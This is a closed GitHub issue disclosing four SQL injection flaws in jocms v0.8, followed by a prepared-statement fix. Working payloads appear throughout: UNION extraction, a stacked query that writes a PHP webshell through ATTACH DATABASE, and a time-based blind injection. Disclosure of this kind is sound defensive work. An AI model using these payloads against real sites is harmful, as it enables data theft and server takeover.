jocms v0.8 has some SQL Injection vulnerability #6

Closed
ghost opened this issue Jun 23, 2021 · 0 comments · Fixed by #11


ghost commented Jun 23, 2021

1. SQL Injection vulnerability

In jocms/apps/mask/inc/mask.php line 18~23:

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $mask = jo_get_masks($decoded["id"])[0];

The function jo_json_check() returns the JSON data submitted by users:

function jo_json_check(){
  if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
      return false;
  }

  $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
  if(strpos(strtolower($contentType), 'application/json') != 0){
      return false;
  }

  $content = trim(file_get_contents("php://input"));

  $decoded = json_decode($content, true);

  if(!is_array($decoded)){
      return false;
  }
  return $decoded;
}

Then jo_get_masks() executes the SQL statement.

function jo_get_masks($id){
    $condition = "";
    $masks = [];
    if($id != "all"){
        $condition = " WHERE id='".$id."' ";
    }else{
        $condition = " WHERE type='mask' ";
    }
    $code;
    $handle = jocms_db_link();
    $result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name");
    while($output = $result->fetchArray()){
        $masks[] = $output;
    }
    return $masks;
}

There is no filtering for the input parameter, so we can use a single quotation mark to close the string and inject. Payload:

{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}

[screenshot: iShot2021-06-23 22 17 29]

2. SQL Injection vulnerability

In jocms/apps/mask/inc/getmask.php line 16~21:

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $masks = jo_get_masks($decoded["content"]);

It's similar to the one above. Just change id to content. Payload:

{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}

[screenshot: iShot2021-06-23 22 23 41]

3. SQL Injection vulnerability

In jocms/apps/mask/mask.php line 19~30:

if(isset($_POST["saved"])){
    if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){
        $code = $_POST["code"];
        $code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code);
        $domobject = str_get_html ($code);
        $attr = "data-jo-content";
        $mask = $domobject->find("*", 0);
        $mask->$attr = "noneditable";
        $code = str_replace("--jo:r--", PHP_EOL,  $domobject->save());
        jo_set_mask($_POST["id"], $_POST["name"], "mask", $code);
    }
}

User-controlled parameters are passed into the function jo_set_mask().

In jocms/core/inc/db.php line 253:

function jo_set_mask($id, $name, $type, $code){
    $handle = jocms_db_link();
    if($id != 0){
        $return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'");
        $return = $id;
    }else{
        $return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')");
        $return = $handle->lastInsertRowid();
    }
    return $return;
}

No filtering for the parameters, so we can execute any SQL statement.

We can write PHP code with this:

saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx

[screenshot: iShot2021-06-23 22 36 08]

Visit:

[screenshot: iShot2021-06-23 22 35 52]

4. SQL Injection vulnerability

In jocms/apps/mask/mask.php line 31~33:

if(isset($_GET["deleted"]) AND isset($_GET["id"])){
    jo_delete_mask($_GET["id"]);
}

Follow the function jo_delete_mask():

function jo_delete_mask($id){
    $handle = jocms_db_link();
    $result = $handle->query("DELETE FROM masks WHERE id='".$id."'");
    return $result;
}

No filtering for the parameter id, so we can inject; use time-based injection:

?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'

[screenshot: iShot2021-06-23 23 16 55]

[screenshot: iShot2021-06-23 23 17 13]
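All four findings share one root cause: user input is concatenated into SQLite3 query strings. The following is an added example (not jocms code, and not the fix merged in #11) showing the three helpers rewritten with prepared statements; it assumes jocms_db_link() returns a SQLite3 handle, as the reported code does, and replaces it with a constructed in-memory database so the script runs stand-alone.

```php
<?php
// Constructed stand-in for jocms_db_link(): in-memory SQLite3 with the masks table.
function jocms_db_link(): SQLite3 {
    static $handle = null;
    if ($handle === null) {
        $handle = new SQLite3(':memory:');
        $handle->exec("CREATE TABLE masks (id INTEGER PRIMARY KEY, name TEXT, type TEXT, code TEXT)");
        $handle->exec("INSERT INTO masks(name,type,code) VALUES ('header','mask','<div></div>')");
    }
    return $handle;
}

// Hardened jo_get_masks(): id is bound as a parameter, never spliced into the SQL text.
function jo_get_masks($id): array {
    $handle = jocms_db_link();
    if ($id === "all") {
        $stmt = $handle->prepare("SELECT * FROM masks WHERE type='mask' ORDER BY name");
    } else {
        $stmt = $handle->prepare("SELECT * FROM masks WHERE id = :id ORDER BY name");
        $stmt->bindValue(':id', $id, SQLITE3_TEXT);  // non-numeric text matches no INTEGER id
    }
    $result = $stmt->execute();
    $masks = [];
    while ($row = $result->fetchArray(SQLITE3_ASSOC)) {
        $masks[] = $row;
    }
    return $masks;
}

// Hardened jo_set_mask(): both branches bind values (the original only escaped the INSERT).
function jo_set_mask($id, $name, $type, $code): int {
    $handle = jocms_db_link();
    if ((int)$id !== 0) {
        $stmt = $handle->prepare("UPDATE masks SET name = :name, code = :code WHERE id = :id");
        $stmt->bindValue(':id', (int)$id, SQLITE3_INTEGER);
    } else {
        $stmt = $handle->prepare("INSERT INTO masks(name,type,code) VALUES (:name, :type, :code)");
        $stmt->bindValue(':type', $type, SQLITE3_TEXT);
    }
    $stmt->bindValue(':name', $name, SQLITE3_TEXT);
    $stmt->bindValue(':code', $code, SQLITE3_TEXT);  // HTML is stored as data, not as SQL
    $stmt->execute();
    return (int)$id !== 0 ? (int)$id : $handle->lastInsertRowID();
}

// Hardened jo_delete_mask(): the GET-driven delete uses the same pattern.
function jo_delete_mask($id): bool {
    $stmt = jocms_db_link()->prepare("DELETE FROM masks WHERE id = :id");
    $stmt->bindValue(':id', (int)$id, SQLITE3_INTEGER);
    return $stmt->execute() !== false;
}
```

Run with the report's id payload, jo_get_masks() returns no rows because the whole string is compared as a value; the id cast in jo_set_mask() and jo_delete_mask() additionally rejects non-numeric ids before they reach SQLite.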
